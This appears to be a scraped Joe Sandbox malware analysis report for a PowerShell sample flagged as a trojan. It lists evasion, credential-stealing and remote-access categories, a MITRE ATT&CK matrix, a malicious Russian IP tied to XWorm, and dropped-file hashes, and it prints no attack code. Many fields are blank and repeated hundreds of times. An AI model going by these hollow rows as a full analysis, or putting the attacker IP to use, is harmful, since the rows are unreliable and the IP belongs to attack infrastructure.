Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File Volume queried: | Jump to behavior | ||
Source: | File Volume queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 1 Masquerading | OS Credential Dumping | 241 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 241 Virtualization/Sandbox Evasion | Security Account Manager | 241 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 211 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Obfuscated Files or Information | Cached Domain Credentials | 23 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
13% | Virustotal | Browse | ||
8% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
176.113.115.228 | unknown | Russian Federation | 49505 | SELECTELRU | true |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1599699 |
Start date and time: | 2025-01-26 10:33:11 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 8m 15s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 13 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | b.ps1 |
Detection: | MAL |
Classification: | mal100.troj.evad.winPS1@7/14@0/1 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis
(whitelisted): dllhost.exe, We rFault.exe, WMIADAP.exe, SIHCl ient.exe, svchost.exe - Excluded IPs from analysis (wh
itelisted): 20.42.73.29, 52.16 8.117.173, 40.126.32.74, 13.10 7.246.45, 20.109.210.53, 20.19 0.159.4 - Excluded domains from analysis
(whitelisted): onedsblobprdeu s16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live .com, otelrules.azureedge.net, slscr.update.microsoft.com, b lobcollector.events.data.traff icmanager.net, onedsblobprdeus 15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwat son.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.c om - Execution Graph export aborted
for target RegSvcs.exe, PID 6 568 because it is empty - Execution Graph export aborted
for target powershell.exe, PI D 3716 because it is empty - Not all processes where analyz
ed, report is missing behavior information - Report size exceeded maximum c
apacity and may have missing b ehavior information. - Report size getting too big, t
oo many NtSetInformationFile c alls found.
Time | Type | Description |
---|---|---|
04:34:11 | API Interceptor | |
04:34:15 | API Interceptor | |
04:34:35 | API Interceptor | |
04:37:46 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
176.113.115.228 | Get hash | malicious | XWorm | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
SELECTELRU | Get hash | malicious | XWorm | Browse |
| |
Get hash | malicious | Socks5Systemz | Browse |
| ||
Get hash | malicious | Socks5Systemz | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Amadey, Babadeda, LummaC Stealer, PureLog Stealer, Stealc, Vidar | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
|
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.1749288364721844 |
Encrypted: | false |
SSDEEP: | 192:CrHEOLEk8Qcsy/0BU/Sa6THy8WkmzuiFNZ24IO8aX:+RL+Q/ZBU/SaWS/9zuiFNY4IO8a |
MD5: | E45700890495370F74E7C5C54F9A3014 |
SHA1: | 20DA3A802629B4A72AAADB7FE97AF3CF1E422841 |
SHA-256: | EEFF8FFD4BBB5171B813499D51DCF2A76C284124A71C7F60E11C31802C5EFB10 |
SHA-512: | FC61D41F00555434E38CEA2243B1552F292A29409B37C57104E650B67EBA4C5D216DFA9CF1FDA94708F9A67929AE1612B4CB9E930B05C241468B77E49F9582BD |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.5318512986567241 |
Encrypted: | false |
SSDEEP: | 96:8B2FajaIhrxYid6zRH3Uje0e35/3oo7p1QXIGZAX/d5FMT2SlPkpXmTAfFf/VXTT:3yaIhmG6zR30mYAzuiFtZ24lO8 |
MD5: | FEDF4338E94A280DF54F3D727CD7FAD0 |
SHA1: | 825D6A39B56FC46507230088622C81B3978E93F1 |
SHA-256: | 5C2BA8ED78B235D841143ACC9F339D357ABCDFE6C03E7E3761007F8AA083FB1B |
SHA-512: | F5EA95DC6E241E5D1C86F101760EAC1E1849C988B2644243B35FB6AFB4819F16058CC18A87066CF457823B9572FD3790AC5D18F1FD302220EAF821C4C065D7EC |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7288 |
Entropy (8bit): | 3.731107745118637 |
Encrypted: | false |
SSDEEP: | 96:RSIU6o7wVetbrpQjW6YEc7ariyM6gmfHNpXEr/BA5aMANm:R6l7wVeJrp/6YEIariypgmftECpANm |
MD5: | 76513552889CE39896431C583A62D1E2 |
SHA1: | A172FB40B67B7F0CC5113AB0416B201862964C05 |
SHA-256: | D5CAFCAC03DDA2E1E72B5FA77148D0519CD230FC4EFFAE8527A028E4A3A32A17 |
SHA-512: | 4BC9D5A403396EF3BBB400B3ECF54840D36076FB99B815E145032468A3B8AC8C54148B54F63D0B28CD82B48902F58A94CC6C23281042667DC14E8196BD9B195D |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4905 |
Entropy (8bit): | 4.692638124385983 |
Encrypted: | false |
SSDEEP: | 96:uIjf0I7OCa7VBJFKloFMMFh+pjWTzFMMFgufnd:uIIYOj7h45Coufd |
MD5: | D751F58A10422CCFF75C786CA27AA9CD |
SHA1: | 509CAFC55A43ED49F36F1565F2A22D218BDC00BD |
SHA-256: | 4D593C2AC31AB669904EC4BFE57317F2858C23182E0B61E6363453DDC49FC494 |
SHA-512: | D8708CFDE51B0E605BC71EBDC383B0DD2679590ED8294DB7F18587B080C48201C2E6A90904E74AF084BEDA72AF7C01005DB510799595E6F1395D6DEE84901D1B |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330087 |
Entropy (8bit): | 3.5427843741165983 |
Encrypted: | false |
SSDEEP: | 6144:brXZw4jvGjVdQTgG6atJRAyR2GlvSQj4SqY:brtvG8TioU5S9 |
MD5: | 7004B2F7C7D7743CA692AC3024B352DC |
SHA1: | 19B9319DCB490318CAE2F54AD1E5A20FF8E26B9E |
SHA-256: | 9F170C35280D1B63C299AEBF24B5ABBD48E01D7C892FC56CB389EB5629F0700D |
SHA-512: | 2B39D36062C4BE8726D59E9C4BEBA2570606E9733AB0597D328931B0D4A0A33C91461588CE96816C10F734241B83A3D55197F6477F3D8ED7C4A176F95165D50C |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8356 |
Entropy (8bit): | 3.68818233754692 |
Encrypted: | false |
SSDEEP: | 192:R6l7wVeJ5b6g8Q6YxGvSkQgmfZ4Aprk89b3GsfgH39m:R6lXJV6gj6Y2S7gmfSs3lfgQ |
MD5: | 09A9BB87F5C9A9B9292F864545B6AB61 |
SHA1: | C790622211946D363A0EA7527E8281B35CB811F7 |
SHA-256: | E15CEE739696E94B48C32E096740A18FDA88E33427749BAA1B12CBDDE6FDB2A1 |
SHA-512: | 9AF2604C9602876914EEF80F8A8B78A467D8D0731570E10CA0DB094716035A5896B376934EBE5A20BEB6E47A4EB385414F20293BA829BC8F3D8695DA046A207C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4726 |
Entropy (8bit): | 4.442737188860243 |
Encrypted: | false |
SSDEEP: | 48:cvIwWl8zsLJg77aI9FCrWpW8VYBYm8M4J+VFo+q8v5kmDIDd:uIjflI7vCa7VZJ/KSmDIDd |
MD5: | 3A3AAFAC7F6E0647CEAEF017769F7FC6 |
SHA1: | C57B29A01101B2088D4CF8B631B9546FF79CCFFE |
SHA-256: | 676E87C60B56AC054632732E9CBDCE728C155F30E88D1C9CD875CAB1AC01764D |
SHA-512: | 8149154B9551FE8C33374335FA454BEDDE1503125B74BA84CEF24A7BC2C7F6E442F71C927EC2E29A69195980A186558D380FF1B099D723CEDE0EC57A0E09F97F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11608 |
Entropy (8bit): | 4.890472898059848 |
Encrypted: | false |
SSDEEP: | 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP |
MD5: | 8A4B02D8A977CB929C05D4BC2942C5A9 |
SHA1: | F9A6426CAF2E8C64202E86B07F1A461056626BEA |
SHA-256: | 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715 |
SHA-512: | 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulJnp/p:NllU |
MD5: | BC6DB77EB243BF62DC31267706650173 |
SHA1: | 9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF |
SHA-256: | 5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27 |
SHA-512: | 91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6222 |
Entropy (8bit): | 3.694767108166484 |
Encrypted: | false |
SSDEEP: | 96:smkCUohGkvhkvCCtRHYkTZdH+HYkTZCFHR:smgjRHYkWHYkO |
MD5: | E09E8E4F52892C518EAEDF3035CDF08E |
SHA1: | 25927B618B9DFCFE71114919D9DDA355282D46AE |
SHA-256: | 7442DE644641FB92CCE879EF2FA52A8024F45394042B881C4A53C7DB9E556529 |
SHA-512: | 974B8F2D443321242BB132E876A6EB812BE562F72DC8D6C886DDC739DDC325AB4387B65142D81DAECCF0A95C7553EAB8B2914B990214261FEE0278EF09EE08CF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6222 |
Entropy (8bit): | 3.694767108166484 |
Encrypted: | false |
SSDEEP: | 96:smkCUohGkvhkvCCtRHYkTZdH+HYkTZCFHR:smgjRHYkWHYkO |
MD5: | E09E8E4F52892C518EAEDF3035CDF08E |
SHA1: | 25927B618B9DFCFE71114919D9DDA355282D46AE |
SHA-256: | 7442DE644641FB92CCE879EF2FA52A8024F45394042B881C4A53C7DB9E556529 |
